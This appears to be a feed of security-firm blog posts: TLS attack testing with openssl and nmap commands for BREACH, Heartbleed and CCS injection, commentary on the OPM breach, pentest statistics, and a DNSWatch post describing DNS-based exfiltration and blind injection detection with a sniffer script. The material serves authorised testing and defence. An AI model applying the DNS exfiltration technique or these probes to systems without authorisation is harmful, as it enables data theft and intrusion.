    0060 - 4d 53 a1 b8 49 8c e7 61-e4 6c e1 51 8e 83 b5 25   MS..I..a.l.Q...%
    0070 - bc 9a 32 d8 fa be 16 a1-ae 3d 8c 0b e3 9e e4 78   ..2......=.....x
    0080 - 77 d7 91 6b a9 a0 01 2b-e1 98 33 d4 2c eb b3 84   w..k...+..3.,...
    0090 - f9 da 0f fa 77 df ac d6-08 b6 34 97 07 d9 b2 58   ....w.....4....X

    Start Time: 1428988675
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---

BREACH

The BREACH attack is analogous to the CRIME attack, but this time exploits the use of HTTP compression to again infer the contents of attacker-influenced requests.

To test whether a server supports deflate or compression, the following steps can be performed:

openssl s_client -connect example.com:443

 

Submitting the following will allow us to see if HTTP compression is supported by the server.

GET / HTTP/1.1
Host: example.com
Accept-Encoding: compress, gzip

 

If the response contains encoded data, similar to the following response, it indicates that HTTP compression is supported; therefore the remote host is vulnerable.

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Sun, 19 Mar 2015 20:48:31 GMT
Content-Type: text/html
Last-Modified: Thu, 19 Mar 2015 23:34:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
 
¬ =�A
�0
   �}E�� �/�փg�
�� oP��
��u4��22��,f&4Y��Į9 .�R�oKc�]�`|�o�r
0

 

A system which does not support deflate or compression will ignore the compress header request and respond with uncompressed data, indicating that it is not vulnerable.

Implementation Issues

SSL/TLS is only as secure as its implementation and a number of flaws have surfaced in TLS software in recent years. This has included TLS (not SSLv3) implementations which are vulnerable to POODLE, and timing attacks such as the Lucky-13 attack. We highlight two notable implementation vulnerabilities here, but more important than their details is the message that keeping SSL/TLS software patched and up-to-date is an essential piece of the security puzzle.

Heartbleed 

The Heartbleed bug is a result of a weakness in OpenSSL. It can be exploited to retrieve memory contents of a server/host running a vulnerable version of OpenSSL.

The following versions of OpenSSL are vulnerable:

• OpenSSL 1.0.1 through 1.0.1f (inclusive)

The following versions of OpenSSL are not vulnerable:

• OpenSSL 1.0.1g 

• OpenSSL 1.0.0 branch 

• OpenSSL 0.9.8 branch 

There are many scripts publicly available that can be used to test whether a system is affected by this vulnerability. 

Servers accessible from the internet can be tested using the Heartbleed test websites like https://filippo.io/Heartbleed/, which is run by Filippo Valsorda.

Alternatively, Nmap (v6.46 and above) can be used to test this bug by using the ‘ssl-heartbleed.nse’ script.

nmap -p 443 --script ssl-heartbleed --script-args vulns.showall example.com

 

The output will be similar to the following:

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt
|_      http://cvedetails.com/cve/2014-0160/

 

Change Cipher Spec Injection

A weakness exists in some versions of OpenSSL which can be exploited by intermediary third parties in order to retrieve sensitive information from encrypted communication.

Affected Versions:

• OpenSSL 1.0.1 through 1.0.1g

• OpenSSL 1.0.0 through 1.0.0l

• all versions before OpenSSL 0.9.8y

Testing requires using publicly available tools, such as the the ‘ssl-ccs-injection’ nmap script by Claudiu Perta, which can be used to test for this vulnerability. This script can be downloaded from https://nmap.org/nsedoc/scripts/ssl-ccs-injection.html.

nmap -p 443 --script ssl-ccs-injection example.com

Sample Output

PORT    STATE SERVICE
443/tcp open  https
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
|       1.0.1h does not properly restrict processing of ChangeCipherSpec
|       messages, which allows man-in-the-middle attackers to trigger use
|       of a zero-length master key in certain OpenSSL-to-OpenSSL
|       communications, and consequently hijack sessions or obtain
|       sensitive information, via a crafted TLS handshake, aka the
|       "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt

Conclusion

This post has presented some of the common attacks and misconfigurations which can undermine the security of SSL/TLS connections. Addressing these should be considered a minimum for anyone configuring SSL/TLS. It should be noted that  other attacks exist which are not covered here, which may require additional work to adequately defend against. Furthermore, a secure SSL/TLS configuration is a moving target and additional or better attacks may be discovered in the future.

The recent US government data breach: big data techniques, a driving force behind a large scale cyber espionage programme?

$
0
0

The recent cyber-attack against the Office of Personnel Management (OPM) has resulted in the compromise of data relating to millions of current and former United States (US) government employees.

In a separate attack against OPM early last year, information relating to individuals who were either seeking to obtain or who had already obtained security clearances was also compromised. The extent of the information lost was vast and included detail relating to the background investigations or checks that led to security clearances of US government officials being granted.

The Chinese government is suspected, by various non-official sources [1], as being linked to this attack and other similar attacks in which huge amounts of Personally Identifiable Information (PII) has been stolen. For example, the attacks on the US Postal Service, health insurer Anthem and healthcare provider Premera Blue Cross. The Chinese government has, of course, denied all involvement.

However, all of these attacks have raised some interesting points for discussion. What would a foreign intelligence service do with huge swathes of PII? Cyber-criminals would of course sell this information, soon after obtaining it, on the black market and PII is now worth more than banking credentials in these circles. However, information relating to all of the above breaches is yet to appear in criminal forums; further indicating that a foreign intelligence service is linked to these attacks.

The targeting of large data sets by a foreign intelligence service suggests that there is a sophisticated capability complementing, and potentially driving forward, the cyber operations collecting this data. A capability that can make connections, spot patterns and draw inferences between diverse collections of data. These huge data sets would be impossible to interrogate without the use of sophisticated software, allowing the data to be manipulated and used in new ways; through the generation of complex queries.

This type of activity is already being used in the commercial world (and to be honest has most likely been used for a long time in the intelligence world). For example, Facebook has a Data Science Team. This team has reportedly developed ways to interrogate the data collected by Facebook in order to predict a user’s political views, their emotional stability and even when they are likely to split up with their partner!

In the same way that data collected via social media could be interrogated, in a commercial sense, in order to target products more effectively or profile users. Large data sets obtained in offensive cyber espionage operations could be interrogated by a foreign intelligence agency to improve the effectiveness of their operational targeting. Not just for follow on cyber-attacks but also to highlight individuals that may be susceptible to coercion, recruitment as human intelligence sources or identify those that would be vulnerable to other technical operations. The end goal of these operations would be the collection of intelligence along political, military and commercial lines. The possibilities are endless and when combined with data that is already in the public domain (like information on social media), it makes for a truly spectacular capability.

Cyber espionage is usually associated with the theft of intellectual property. However, in reality the scope is much broader. Cyber has revolutionised the way traditional espionage is conducted. And, through utilisation of offensive cyber capabilities, a much broader range of information is available to a foreign intelligence service than ever before. This information can be obtained quickly, with very little risk. When you add to this equation the use of ‘big data’ techniques in order to interrogate this information, it makes for a very powerful capability that can drive and dictate further intelligence collection opportunities. In addition, what should not be underestimated is the significant resource at the disposal of a foreign intelligence service. They have a wide range of capabilities, of which cyber is just one tool. These capabilities can be used interchangeably and are complementary.

All data is valuable. You may think that your data (whether commercial or personal) would not be of interest to a foreign intelligence service or criminal group. However, when that data is combined with other sources of information that is already in the hostile entities possession, it becomes a lot more valuable and exploitable.

[1]: http://www.usatoday.com/story/news/nation/2015/06/04/obama-office-of-personnel-management-data-breach/28495775/ ;

http://fedscoop.com/researchers-link-chinese-to-anthem-opm-hacks ;

http://www.washingtontimes.com/news/2015/jun/5/chinese-opm-hackers-also-behind-massive-health-car/

Vulnerability Statistics & Trends in 2015

$
0
0

I have conducted research using Context’s penetration testing management database across 3,475 web application and infrastructure penetration tests for the years 2013, 2014 & 2015. The research included a statistical analysis of the quantity, severity and exploitability of the findings we identified within our penetration tests. This analysis yielded the following high level points:

  • The number of vulnerabilities discovered in application assessments remains consistent at around 9 findings per test, but infrastructure engagements show a decline in the number of vulnerabilities discovered (23.3 to 12.1 per test for external infrastructure, and 32.8 to 23.0 per test for internal infrastructure).
  • The proportion of high impact of vulnerabilities has also remained consistent for applications (16%), but again infrastructure shows a steady decline from an initially high starting point (20.2% to 8.2% for external infrastructure, and 28.9% to 15.9% for internal infrastructure).
  • The proportion of high impact vulnerabilities that are considered easy to exploit has remained consistent for both applications (~35%) and internal infrastructure (~85%) engagements, but external infrastructure, while still quite high (57%), has dropped in 2015.

So far in 2015, our statistics suggest that approximately 1 in every 2 application or external infrastructure tests possess an easily exploitable, high impact vulnerability. For internal infrastructure, there are over 3 high impact, easily exploited vulnerabilities per test.

This average has been consistent for application assessments since 2013, suggesting that application security is neither getting substantially worse nor better. However, both external and internal infrastructure tests have been showing improved security postures, with decreasing numbers of total findings and a smaller share of high impact findings present.

Context attributes this change to the remediation advice we provide to our customers. Most assurance work we undertake, particularly for new customers, will typically be for web applications. These applications may not have received assurance work before, and as a result will often have more serious vulnerabilities. This balances out against the improving security observed with existing customers, leading to consistent statistics over the timeframe.

Infrastructure work on the other hand is more often requested by customers Context has a prior working relationship with, and over time the security measures in place will begin to improve as they follow our remediation advice.

Average Number of Vulnerabilities

An assessment of the average number of vulnerabilities per test for web application assessments was carried out. The following table shows the result:


These results show that the average number of findings, proportion of high impact findings and easily exploited high impact findings has remained relatively consistent over the period analysed for web application assessments.

Contrastingly, the results for infrastructure assessments – which can be split into external and internal infrastructure – suggest that these numbers are reducing:















The results suggest that external infrastructure engagements are beginning to resemble application security assessments in terms of the number and severity of findings. However, any high impact findings discovered for an external infrastructure test are still much more likely to be easily exploited (35.6% to 57.4%). This may be due to the consistently active development of attack frameworks such as Metasploit which make the process of exploiting an infrastructure vulnerability and simple exercise available to attackers without an in-depth understanding of the vulnerability itself.

The trends have also shown that internal infrastructure engagements have on average fewer vulnerabilities than in previous years, though these are still substantially higher than other tests, averaging 9 for applications, 12 for external infrastructure and 23 for internal infrastructure in 2015.

One possible explanation for the prevalence of vulnerabilities within internal infrastructure would be the implicit trust given to employees, with administrators more concerned about external threats. This would explain why the number of external infrastructure vulnerabilities has dropped significantly, but it also suggests that a malicious insider remains a substantial threat to the security of an organisation’s networks.

High Impact Findings

Context assigns impact ratings for each finding, with the most common being Critical, High, Medium and Low.  High impact vulnerabilities are those that would normally result in an attacker gaining unauthorised access, or compromise of user data/application functionality that could lead to financial or legal impact.

Application

Since 2013, application findings graded as having a high impact or above have remained constant, at around 16% each year. This averages out to just over 1 high impact finding for each application test.


Infrastructure

In addition to the decreasing number of vulnerabilities discovered in infrastructure tests, the proportion of these findings that have a high impact has also been decreasing. This decrease has taken the proportion of high impact findings for external infrastructure from 20.2% in 2013 to only 8.2% in 2015.



Internal infrastructure has also shown a similar decrease; high impact findings make up 28.9% of all vulnerabilities in 2013, which is down to 15.9% in 2015.


High & Easily Exploited Vulnerabilities

Identified findings are rated according to impact; however an “ease of exploitation” is also assigned to each finding describing the skill or knowledge level required to exploit the relevant issue. Easily exploitable vulnerabilities are those that can be exploited by an attacker possessing a low-level of knowledge or beginner skillset, possibly using a well-publicised exploit, within a short period of time.

Across all three years, application and internal infrastructure engagements have yielded consistent difficulty ratings for high impact findings. For applications, approximately 35% of high impact findings are considered easy to exploit; for internal infrastructure, typically 80% to 90% of high impact vulnerabilities are easily exploitable.



External infrastructure again shows a decrease, with the proportion of easily exploited high impact findings going from around 75% down to under 60%.

Follow Up and Contact

Steve is a part of our Assurance team based in our Cheltenham office.

DNSWatch - When a full DNS tunnel is just too much

$
0
0

During certain engagements it is a requirement to extract data from a network - or at least prove that it would be possible in different ways. One common and very well-known way to do this is to ex-filtrate data using DNS tunnels. Previously we’ve looked into options about how to quickly identify if DNS tunneling is possible during a penetration test. Later this became helpful with a wider range of our services too - like Red Team engagements. We reviewed several ideas and existing tools, but none of them were flexible enough to do what we needed and that's when I came up with the simple idea of DNSWatch. 

The concept behind DNS tunnels is not ground breaking and is very well known within the industry, but the following provides an insight into the work we did, and offers an example of how we turn ideas into developed services.

In the following blog post I will explain how we set up our systems to support the potential identification of DNS tunnels, but also how this system can be used to help detect common vulnerabilities. 

While nothing is wrong with the known methods (or just starting a sniffer), our methodology becomes useful when initiating a DNS query and you would like to be notified quickly and easily if the name that was requested was resolved, maybe even with some content leaked from the target system.

So this is how it works:

 

In the above example the "Target" would initiate a name resolution of the "Context DNS Tunnel" domain by requesting the record from its default name server. This "Target Nameserver" would then query the corresponding name server for a specific zone (1. Rootserver, 2. ".com Nameserver", 3. "Context Nameserver"). The Context name server delegates the control of the DNS subdomain to our DNS Tunnel-Server which contains the below script. We can now take the query that we have received and send it (in our case via email) to one of our consultants.

Because we have many consultants at Context a key was used to provide each consultant with their own "DNS Token" (sub-domain) which is then mapped to the corresponding email address.

The following is an example to generate this token:

...
# store everything before @domain.tld and cleanup
name=email[:email.find('@')].replace('.','')
# append 32 char long random token to email
token=name+''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(32))
...

The script itself is straight forward:

...
PEOPLES=[]
with open('consultants.csv') as csvfile:
 reader = csv.reader(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
 for row in reader:
  PEOPLES.append([row[0].lower(),row[1],int(time.time())])

def findConsultant(packet):
 # save the IP as a string
 SRCIP=str(packet.payload.src)
 # save the query domain as a string
 DSTDOMAIN=str(packet.payload.payload.payload.qd.qname).lower()
 if TUNNELDOMAIN in DSTDOMAIN and not "polling" in DSTDOMAIN:
  # loop through our people
  for PEOPLE in PEOPLES:
   # in case the domainname queried matches a defined record
   if PEOPLE[0] in DSTDOMAIN:
    # send email with the email address that macthes to that domain
    if "burp" in DSTDOMAIN:
     MSG="From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (FROM, PEOPLE[1], SUBJB)
     TEXT="Burp performed an injection which was used to resolve your personal unique domain name (%s). The origin IP is: %s\nYou should check the logs for the token to find the issue" % (DSTDOMAIN, SRCIP)
    else:
     MSG="From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (FROM, PEOPLE[1], SUBJA)
     TEXT="A system made an attempt to resolve your personal unique domain name (%s). The origin IP is: %s" % (DSTDOMAIN, SRCIP)
    sendmymail(FROM, PEOPLE[1], MSG, TEXT)
    # update the timestamp
    PEOPLE[2]=int(time.time())
...
  failed = server.sendmail(FROM, TO, MSG+TEXT)
...
   res=sniff(filter="udp dst port 53", prn=findConsultant)
...

The DNSWatch script listens for any content that arrives on UDP port 53 and then calls a function to process the content. We then loop through a defined list of tokens for the consultant group and see if the defined domain and token can be found. The final step is to collect the required information from the receiving packet and deliver the email to the correct consultant.

Those are the basics of this simple script. To identify if a DNStunnel would be possible we just need to query our name and wait for an email to arrive. Of course, that could partially be completed by checking any domain name if the output can be seen. However, with the little bit extra code that we have added we can also extract bits of content by pre-adding it to our token, for example as an additional sub-domain. Additionally we can perform it blind. A sample email received looks like this:


In this example the value:
TGludXgga2FsaTEgMy4xNC1rYWxpMS02ODYtcGFlICMxIFNNUCBEZWJpYW4gMy4xNC41LTFrYWxpMSAoMjAxNC0wNi0wNykgaTY4NiBHTlUvTGludXgK

...is decoded as base64:

Linux kali1 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux

…and is an example of the output for the "uname -a" command on Unix. Please note that each sub-domain ("label") has a maximum length of 63 characters and in total a maximum of 253 characters is defined.

We found the script useful on a number of occasions where a full backdoor won't be necessary to prove the potential for code execution or data ex-filtration, and also when it came to identifying or assisting in vulnerability testing. When performing an application test certain checks can be performed which will generate an email if the application is vulnerable. The following table provides an example overview about some of those simple checks:


A new feature from “Burpsuite” is the “Burp Collaborator” (http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html) which use DNS to detect otherwise undetectable injections (“super blind injections”) in an automated fashion. In fact it turns out that Portswigger used the same technique as a basis for the collaborator server. When an injection has been discovered an email with the “token” is generated. This token can be found in the burp log to analyse and verify the root cause. An example is provided below:


The corresponding request/response (from log) in Burpsuite is:


The log entry and retest showed that there is a command injection in the application which used the command “nslookup” to perform a DNS lookup in order to prove the vulnerability.

Therefore you have two options here to use DNS to detect web application issues. Either automated testing via Burpsuite using “active scan” or via supporting your manual testing. The latter one has been used by Context for some years already where testing has been performed using a list of payloads which uses your domain name with some great success.

Thanks to my colleague Jamie for setting up the DNS Server and Dan for adding the logging and daemon part to my script.

The full version of the scripts can be found on our github: https://github.com/ctxis/DNSWatch

Contact and Follow-Up

Sven is a part of our Assurance team in Context's Essen office. See the Contact page for how to get in touch.
Viewing all 262 articles
Browse latest View live